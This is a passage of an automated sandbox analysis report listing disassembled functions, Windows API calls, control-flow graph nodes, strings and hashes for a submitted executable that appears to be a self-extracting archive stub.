                                              • Instruction ID: ffb84a45eef418dbfd463efc56063bf2c89c2e98c5299e8b9a11a3734b779bef
                                              • Opcode Fuzzy Hash: d3899fa8a68d003ce9ec7adc7b3f0bcf93a7dec0773026d1a3df1520336a3860
                                              • Instruction Fuzzy Hash: DAF183B1400289DBCF24DFA4CC89FDE7BA9BF06308F54422DF91A9B191DB709A49DB51
                                              Function 00CB3572 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 106windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00CB0678: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                                • Part of subcall function 00CB0678: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                                • Part of subcall function 00CB0678: IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                                • Part of subcall function 00CB0678: TranslateMessage.USER32(?), ref: 00CB06BC
                                                • Part of subcall function 00CB0678: DispatchMessageW.USER32(?), ref: 00CB06C6
                                              • GetDlgItem.USER32(00000068,00000000), ref: 00CB3595
                                              • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,00CAFD20,00000001,?,?), ref: 00CB35BA
                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CB35C9
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC6C8), ref: 00CB35D7
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CB35F1
                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CB360B
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CB364F
                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CB3662
                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CB3675
                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CB369C
                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CCC860), ref: 00CB36AB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                              • String ID: \
                                              • API String ID: 3569833718-2967466578
                                              • Opcode ID: acaa096e2ef0cd9a84f5644026291abbcae37717fbeff0f0b3b9c7016ebd6792
                                              • Instruction ID: 80b71340ea5d8e1952d56186a3fce32fa69217a0603b4536f5680cc885092c7d
                                              • Opcode Fuzzy Hash: acaa096e2ef0cd9a84f5644026291abbcae37717fbeff0f0b3b9c7016ebd6792
                                              • Instruction Fuzzy Hash: 9231D071249780BFE3109F20DC89FAF7BECEF46705F000619F9559A2E0DB649A058BA6
                                              Function 00CB38A0 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 291windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 632 cb38a0-cb38bc call cb57d8 635 cb38c2-cb38c8 632->635 636 cb3bc7-cb3bd4 call c91a66 call cb5787 632->636 635->636 637 cb38ce-cb38f4 call cb71f0 635->637 643 cb38fd-cb3909 637->643 644 cb38f6 637->644 646 cb390b 643->646 647 cb390d-cb3916 643->647 644->643 646->647 648 cb3918-cb391b 647->648 649 cb3924-cb3927 647->649 650 cb391f-cb3922 648->650 651 cb391d 648->651 652 cb392b-cb3935 649->652 653 cb3929 649->653 650->652 651->650 654 cb393b-cb3948 652->654 655 cb39ce 652->655 653->652 656 cb394a 654->656 657 cb394c-cb3956 654->657 658 cb39d1-cb39d3 655->658 656->657 659 cb3958 657->659 660 cb398c-cb3999 657->660 661 cb39dc-cb39de 658->661 662 cb39d5-cb39da 658->662 665 cb396f-cb3972 659->665 663 cb399b 660->663 664 cb399d-cb39a7 660->664 666 cb39ff-cb3a11 call ca1383 661->666 667 cb39e0-cb39e7 661->667 662->661 662->666 663->664 669 cb39ad-cb39b2 664->669 670 cb3bd7-cb3bdd 664->670 671 cb395a-cb395f 665->671 672 cb3974 665->672 685 cb3a29-cb3a64 call c914a7 call c9ed0d call c91a66 666->685 686 cb3a13-cb3a20 call ca8da4 666->686 667->666 673 cb39e9-cb39f5 667->673 677 cb39b6-cb39bc 669->677 678 cb39b4 669->678 674 cb3bdf 670->674 675 cb3be1-cb3be8 670->675 679 cb3963-cb396d 671->679 680 cb3961 671->680 672->660 681 cb39fc 673->681 682 cb39f7 673->682 674->675 683 cb3bea-cb3bf0 675->683 684 cb3c00-cb3c06 675->684 677->670 687 cb39c2-cb39c5 677->687 678->677 679->665 688 cb3976-cb397b 679->688 680->679 681->666 682->681 689 cb3bf2 683->689 690 cb3bf4-cb3bfd 683->690 692 cb3c0a-cb3c14 684->692 693 cb3c08 684->693 705 cb3a9d-cb3aac ShellExecuteExW 685->705 706 cb3a66-cb3a95 call c914a7 call ca0e49 call c91a66 685->706 686->685 700 cb3a22 686->700 687->654 694 cb39cb 687->694 696 cb397f-cb3989 688->696 697 cb397d 688->697 689->690 690->684 692->658 693->692 694->655 696->660 697->696 700->685 708 cb3b7c-cb3b82 705->708 709 cb3ab2-cb3abc 705->709 740 cb3a9a 706->740 741 cb3a97 706->741 711 cb3bb7-cb3bc3 708->711 712 cb3b84-cb3b99 708->712 713 cb3aca-cb3acc 709->713 714 cb3abe-cb3ac0 709->714 711->636 716 cb3b9b-cb3bab call c919a9 712->716 717 cb3bae-cb3bb6 call cb5726 712->717 719 cb3ace-cb3ad7 IsWindowVisible 713->719 720 cb3ae5-cb3af6 WaitForInputIdle call cb3fcf 713->720 714->713 718 cb3ac2-cb3ac8 714->718 716->717 717->711 718->713 725 cb3b30-cb3b3b CloseHandle 718->725 719->720 726 cb3ad9-cb3ae3 ShowWindow 719->726 727 cb3afb-cb3b02 720->727 730 cb3b3d-cb3b4a call ca8da4 725->730 731 cb3b4c-cb3b53 725->731 726->720 727->725 733 cb3b04-cb3b06 727->733 730->731 736 cb3b6b-cb3b6d 730->736 731->736 737 cb3b55-cb3b57 731->737 733->725 739 cb3b08-cb3b17 GetExitCodeProcess 733->739 736->708 738 cb3b6f-cb3b71 736->738 737->736 743 cb3b59-cb3b5f 737->743 738->708 744 cb3b73-cb3b76 ShowWindow 738->744 739->725 745 cb3b19-cb3b22 739->745 740->705 741->740 743->736 746 cb3b61 743->746 744->708 747 cb3b29 745->747 748 cb3b24 745->748 746->736 747->725 748->747
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CB38A7
                                              • ShellExecuteExW.SHELL32(?), ref: 00CB3AA4
                                              • IsWindowVisible.USER32(?), ref: 00CB3ACF
                                              • ShowWindow.USER32(?,00000000), ref: 00CB3ADD
                                              • WaitForInputIdle.USER32(?,000007D0), ref: 00CB3AED
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00CB3B0F
                                              • CloseHandle.KERNEL32(?), ref: 00CB3B33
                                              • ShowWindow.USER32(?,00000001), ref: 00CB3B76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Show$CloseCodeExecuteExitH_prolog3_HandleIdleInputProcessShellVisibleWait
                                              • String ID: .exe$.inf
                                              • API String ID: 3208621885-3750412487
                                              • Opcode ID: 0c58b8ffa6dad72e17fcd6561b7784fa01b7315e772ec9d19bb53dc78d1afa9a
                                              • Instruction ID: beb6536935a0277372a8fa3921121bf74da6ca369c1128bdba0e07d7f3cd9f7a
                                              • Opcode Fuzzy Hash: 0c58b8ffa6dad72e17fcd6561b7784fa01b7315e772ec9d19bb53dc78d1afa9a
                                              • Instruction Fuzzy Hash: 84B1AD31E00298DFCF21DFA4C989BEDB7B5AF44310F288119E854AB295DB74AF46DB50
                                              Function 00CAF2CE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1052 caf2ce-caf2f7 GetClassNameW 1053 caf2f9-caf30e call ca8da4 1052->1053 1054 caf31f-caf321 1052->1054 1060 caf31e 1053->1060 1061 caf310-caf31c FindWindowExW 1053->1061 1055 caf32c-caf338 call cb5734 1054->1055 1056 caf323-caf325 1054->1056 1056->1055 1060->1054 1061->1060
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000050), ref: 00CAF2EF
                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00CAF326
                                                • Part of subcall function 00CA8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00CA0E3F,?,?,?,00000046,00CA1ECE,00000046,?,exe,00000046), ref: 00CA8DBA
                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00CAF316
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                              • String ID: @Ut$EDIT
                                              • API String ID: 4243998846-2065656831
                                              • Opcode ID: be2a505704b3d53406911378375727f4731e06c0a8408a385bc7f42fea905bcd
                                              • Instruction ID: 8c587388f7a8360227b81feab4b8a53e8e18db69ebef5dc7ff4a8135aee556d5
                                              • Opcode Fuzzy Hash: be2a505704b3d53406911378375727f4731e06c0a8408a385bc7f42fea905bcd
                                              • Instruction Fuzzy Hash: 77F0C871701219ABDF20AB64DD45FDFB7ACDF46B04F010069B901FB190DA70AA058669
                                              Function 00C9E180 Relevance: 7.7, APIs: 5, Instructions: 183filetimeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1063 c9e180-c9e1c9 1064 c9e1cb-c9e1ce 1063->1064 1065 c9e1d4 1063->1065 1064->1065 1066 c9e1d0-c9e1d2 1064->1066 1067 c9e1d6-c9e1e6 1065->1067 1066->1067 1068 c9e1e8 1067->1068 1069 c9e1ee-c9e1f8 1067->1069 1068->1069 1070 c9e1fa 1069->1070 1071 c9e1fd-c9e22a 1069->1071 1070->1071 1072 c9e22c 1071->1072 1073 c9e232-c9e238 1071->1073 1072->1073 1074 c9e23a 1073->1074 1075 c9e23c-c9e254 CreateFileW 1073->1075 1074->1075 1076 c9e25a-c9e28a GetLastError call ca169a 1075->1076 1077 c9e316 1075->1077 1083 c9e28c-c9e293 1076->1083 1084 c9e2be 1076->1084 1079 c9e319-c9e31c 1077->1079 1081 c9e32a-c9e32e 1079->1081 1082 c9e31e-c9e321 1079->1082 1086 c9e34f-c9e360 1081->1086 1087 c9e330-c9e333 1081->1087 1082->1081 1085 c9e323 1082->1085 1088 c9e298-c9e2b8 CreateFileW GetLastError 1083->1088 1089 c9e295 1083->1089 1091 c9e2c1-c9e2cb 1084->1091 1085->1081 1092 c9e362-c9e370 call c925c3 1086->1092 1093 c9e374-c9e39a call c91a66 call cb5734 1086->1093 1087->1086 1090 c9e335-c9e34c SetFileTime 1087->1090 1088->1084 1095 c9e2ba-c9e2bc 1088->1095 1089->1088 1090->1086 1096 c9e2cd-c9e2e2 1091->1096 1097 c9e300-c9e314 1091->1097 1092->1093 1095->1091 1101 c9e2e4-c9e2f4 call c919a9 1096->1101 1102 c9e2f7-c9e2ff call cb5726 1096->1102 1097->1079 1101->1102 1102->1097
                                              APIs
                                              • CreateFileW.KERNELBASE(?,00000001,00000000,00000000,00000003,08000000,00000000,9CAA5719,?,?,00000000,?,?,00000000,00CC9E6B,000000FF), ref: 00C9E248
                                              • GetLastError.KERNEL32(?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00C9E25A
                                              • CreateFileW.KERNEL32(?,00000001,00000000,00000000,00000003,08000000,00000000,?,?,?,?,00000000,00CC9E6B,000000FF,?,00000011), ref: 00C9E2A6
                                              • GetLastError.KERNEL32(?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?,?,?,?,?), ref: 00C9E2AF
                                              • SetFileTime.KERNEL32(00000000,00000000,?,00000000,?,?,00000000,00CC9E6B,000000FF,?,00000011,?,?,00000000,?,?), ref: 00C9E346
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: File$CreateErrorLast$Time
                                              • String ID:
                                              • API String ID: 1999340476-0
                                              • Opcode ID: ddf92e1cb076435076c300b55c5a4200087165c2225945fc5abaf74c7cef4637
                                              • Instruction ID: f364d86b8a9ebdedfb5ea9b86696404a1f355c8ad40ab011ba8e97c56f38ca63
                                              • Opcode Fuzzy Hash: ddf92e1cb076435076c300b55c5a4200087165c2225945fc5abaf74c7cef4637
                                              • Instruction Fuzzy Hash: B061AE70900649EFDF24CFA4C889BEE7BB4FF18314F20062AF82597291D774AA44CB94
                                              Function 00CA74EC Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1109 ca74ec-ca7536 call ca77cf ReleaseSemaphore 1112 ca7538 1109->1112 1113 ca7556-ca758a DeleteCriticalSection CloseHandle * 2 1109->1113 1114 ca753b-ca7554 call ca75ed CloseHandle 1112->1114 1114->1113
                                              APIs
                                                • Part of subcall function 00CA77CF: ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,00000004,00C973B8), ref: 00CA77E1
                                                • Part of subcall function 00CA77CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00000004,00C973B8), ref: 00CA77F5
                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000,9CAA5719,?,?,00000001,00000000,00CCA603,000000FF,?,00CA90B9,?,?,00C95630,?), ref: 00CA752A
                                              • CloseHandle.KERNELBASE(?,?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?), ref: 00CA7544
                                              • DeleteCriticalSection.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA755D
                                              • CloseHandle.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA7569
                                              • CloseHandle.KERNEL32(?,?,00CA90B9,?,?,00C95630,?,?,?,00000000,?,?,?,00000001,?,?), ref: 00CA7575
                                                • Part of subcall function 00CA75ED: WaitForSingleObject.KERNEL32(?,000000FF,00CA770A,?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75F3
                                                • Part of subcall function 00CA75ED: GetLastError.KERNEL32(?,?,00CA777F,?,?,?,?,?,00CA7769), ref: 00CA75FF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                              • String ID:
                                              • API String ID: 1868215902-0
                                              • Opcode ID: 57085ae4eaefd0a7b3bd0a63c1e5863404e54f3aca53e38eaeb5c633d72380c2
                                              • Instruction ID: 698705aa25d57b1a421ed9b4db81fb42a10ae01a5ea4558fb973f742d136e5a0
                                              • Opcode Fuzzy Hash: 57085ae4eaefd0a7b3bd0a63c1e5863404e54f3aca53e38eaeb5c633d72380c2
                                              • Instruction Fuzzy Hash: AF118472504705EFC7229F64DDC4FCAFBA9FB08754F00492AF16B92160CB71A941CB54
                                              Function 00CB0678 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1117 cb0678-cb0691 PeekMessageW 1118 cb06cc-cb06ce 1117->1118 1119 cb0693-cb06a7 GetMessageW 1117->1119 1120 cb06a9-cb06b6 IsDialogMessageW 1119->1120 1121 cb06b8-cb06c6 TranslateMessage DispatchMessageW 1119->1121 1120->1118 1120->1121 1121->1118
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CB0689
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CB069A
                                              • IsDialogMessageW.USER32(00010464,?), ref: 00CB06AE
                                              • TranslateMessage.USER32(?), ref: 00CB06BC
                                              • DispatchMessageW.USER32(?), ref: 00CB06C6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Message$DialogDispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 1266772231-0
                                              • Opcode ID: 5a497302951a8b1cbca3e11002a057f234e9fa703ebb640a34d919922cb0017f
                                              • Instruction ID: 195584218c4f2582487f4afe53af54d55f560888869fcf9a8b459e03a1e83164
                                              • Opcode Fuzzy Hash: 5a497302951a8b1cbca3e11002a057f234e9fa703ebb640a34d919922cb0017f
                                              • Instruction Fuzzy Hash: 42F030B190625AAB8F20ABE2EC8CFDF7FACEE452A07004510F916D2050E724D605CBB0
                                              Function 00CB2813 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 237COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1122 cb2813-cb2845 call c97673 1125 cb284a-cb2850 1122->1125 1126 cb2847 1122->1126 1127 cb2abd 1125->1127 1128 cb2856-cb285b 1125->1128 1126->1125 1131 cb2abf-cb2ac3 1127->1131 1129 cb285d 1128->1129 1130 cb2860-cb286e 1128->1130 1129->1130 1132 cb2870-cb287c 1130->1132 1133 cb2896 1130->1133 1134 cb2ace-cb2ad2 1131->1134 1135 cb2ac5-cb2ac8 1131->1135 1132->1133 1138 cb287e 1132->1138 1139 cb2899-cb289c 1133->1139 1136 cb2af7 1134->1136 1137 cb2ad4-cb2ad7 1134->1137 1135->1136 1140 cb2aca-cb2acc 1135->1140 1147 cb34ad-cb34c5 call c958cb 1136->1147 1137->1136 1141 cb2ad9 1137->1141 1142 cb2884-cb2888 1138->1142 1143 cb28a2-cb28a7 1139->1143 1144 cb2ab7 1139->1144 1145 cb2ada-cb2af2 call c97673 call cb38a0 1140->1145 1141->1145 1148 cb288e-cb2894 1142->1148 1149 cb29f0-cb29f2 1142->1149 1150 cb28a9 1143->1150 1151 cb28ac-cb28d7 call cbacee call c91afc 1143->1151 1144->1127 1145->1136 1148->1133 1148->1142 1149->1133 1154 cb29f8-cb29fc 1149->1154 1150->1151 1151->1147 1161 cb28dd-cb28e1 1151->1161 1154->1139 1162 cb28e3 1161->1162 1163 cb28e5-cb28ec 1161->1163 1162->1163 1164 cb28ee 1163->1164 1165 cb28f1-cb292f call c9120c call ca645a 1163->1165 1164->1165 1170 cb2935-cb2937 1165->1170 1171 cb293d-cb299f call c914a7 call c9adaa call c91a66 call c914a7 call c9adaa call c91a66 1170->1171 1172 cb2a01-cb2a07 1170->1172 1201 cb29a1-cb29a3 1171->1201 1202 cb29a4-cb29d2 call c914a7 call c9adaa call c91a66 1171->1202 1173 cb2a09-cb2a24 1172->1173 1174 cb2a4e-cb2a68 1172->1174 1179 cb2a26-cb2a3f call c919a9 1173->1179 1180 cb2a45-cb2a4d call cb5726 1173->1180 1177 cb2a6a-cb2a85 1174->1177 1178 cb2aaf-cb2ab5 1174->1178 1182 cb2a87-cb2aa0 call c919a9 1177->1182 1183 cb2aa6-cb2aae call cb5726 1177->1183 1178->1131 1179->1180 1180->1174 1182->1183 1183->1178 1201->1202 1209 cb29d7-cb29eb call ca645a 1202->1209 1210 cb29d4-cb29d6 1202->1210 1209->1170 1210->1209
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: HIDE$MAX$MIN
                                              • API String ID: 176396367-2426493550
                                              • Opcode ID: 353f2de6ecbfa879d39ec6bb723479e7c68e2fe27b49d92e828edf9c69a03359
                                              • Instruction ID: 4ee175ca5471d51ec8bf79fb2efb3c4b2483e0d6d33d13ec5c85bc9afea13598
                                              • Opcode Fuzzy Hash: 353f2de6ecbfa879d39ec6bb723479e7c68e2fe27b49d92e828edf9c69a03359
                                              • Instruction Fuzzy Hash: BD917D72C00269DECF24DBA4CC85ADDB7B8BF49310F14059AE805B7281DB359F86EB90
                                              Function 00CAF4D4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34comCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00CA6C5E: __EH_prolog3_GS.LIBCMT ref: 00CA6C65
                                                • Part of subcall function 00CA6C5E: GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00CA6C9A
                                              • OleInitialize.OLE32(00000000), ref: 00CAF4ED
                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CAF524
                                              • SHGetMalloc.SHELL32(00CE532C), ref: 00CAF52E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: DirectoryGdiplusH_prolog3_InitializeMallocStartupSystem
                                              • String ID: riched20.dll
                                              • API String ID: 2446841611-3360196438
                                              • Opcode ID: d08afd0727390ffc7f7fa10e8bca5cb0bf40542fd2048831f57a57fef2061917
                                              • Instruction ID: bd0f6c12d24520dcd628076d4165b37be403ba18f95bf2c1c4eb8c457a3aeb28
                                              • Opcode Fuzzy Hash: d08afd0727390ffc7f7fa10e8bca5cb0bf40542fd2048831f57a57fef2061917
                                              • Instruction Fuzzy Hash: FCF01DB5D00249ABCB10AF99DC49AEFFFFCEF94704F00416AF415E2250D7B856058BA1
                                              Function 00C9E948 Relevance: 6.1, APIs: 4, Instructions: 117fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1217 c9e948-c9e961 call cb57d8 1220 c9e96a-c9e974 1217->1220 1221 c9e963-c9e965 1217->1221 1223 c9e988 1220->1223 1224 c9e976-c9e983 GetStdHandle 1220->1224 1222 c9eaa6-c9eaab call cb5787 1221->1222 1226 c9e98b-c9e998 1223->1226 1225 c9ea6f-c9ea72 1224->1225 1225->1226 1228 c9e99a-c9e99e 1226->1228 1229 c9e9df-c9e9f4 WriteFile 1226->1229 1232 c9e9ff-c9ea03 1228->1232 1233 c9e9a0-c9e9ab 1228->1233 1231 c9e9f7-c9e9f9 1229->1231 1231->1232 1234 c9ea9f-c9eaa2 1231->1234 1232->1234 1235 c9ea09-c9ea0d 1232->1235 1236 c9e9ad 1233->1236 1237 c9e9af-c9e9ce WriteFile 1233->1237 1234->1222 1235->1234 1239 c9ea13-c9ea25 call c99230 1235->1239 1236->1237 1237->1231 1238 c9e9d0-c9e9db 1237->1238 1238->1233 1240 c9e9dd 1238->1240 1243 c9ea77-c9ea9a call c914a7 call c99653 call c91a66 1239->1243 1244 c9ea27-c9ea30 1239->1244 1240->1231 1243->1234 1244->1226 1246 c9ea36-c9ea3a 1244->1246 1246->1226 1248 c9ea40-c9ea6c 1246->1248 1248->1225
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9E94F
                                              • GetStdHandle.KERNEL32(000000F5,0000002C,00CA2D28,?,?,?,?,00000000,00CAABB6,?,?,?,?,?,00CAA80E,?), ref: 00C9E978
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C9E9BE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                              • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmpDownload File
